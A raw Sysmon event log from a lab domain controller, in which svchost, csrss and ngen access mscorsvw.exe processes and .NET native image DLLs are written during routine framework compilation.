13:50:59.757{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9243-6005-3504-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.757{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9243-6005-3504-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.757{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9243-6005-3504-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9243-6005-3404-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.695{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9243-6005-3404-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.695{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9243-6005-3404-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:59.617{59A5CD1D-9243-6005-3304-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9d4-0\System.DirectoryServices.AccountManagement.dll2021-01-18 13:50:59.617 10341000x80000000000000008491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.242{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9243-6005-3304-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.148{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9243-6005-3304-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.148{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9243-6005-3304-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9243-6005-3204-00000000A301}1684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.070{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9243-6005-3204-00000000A301}1684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.070{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9243-6005-3204-00000000A301}1684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:59.008{59A5CD1D-9242-6005-3104-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\106c-0\System.Device.dll2021-01-18 13:50:59.008 10341000x80000000000000008518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.992{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.992{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.648{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.648{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:00.586{59A5CD1D-9244-6005-3904-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1390-0\System.Dynamic.dll2021-01-18 13:51:00.586 10341000x80000000000000008512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3904-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.382{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3904-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.382{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3904-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.320{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3804-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.304{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3804-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.304{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3804-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1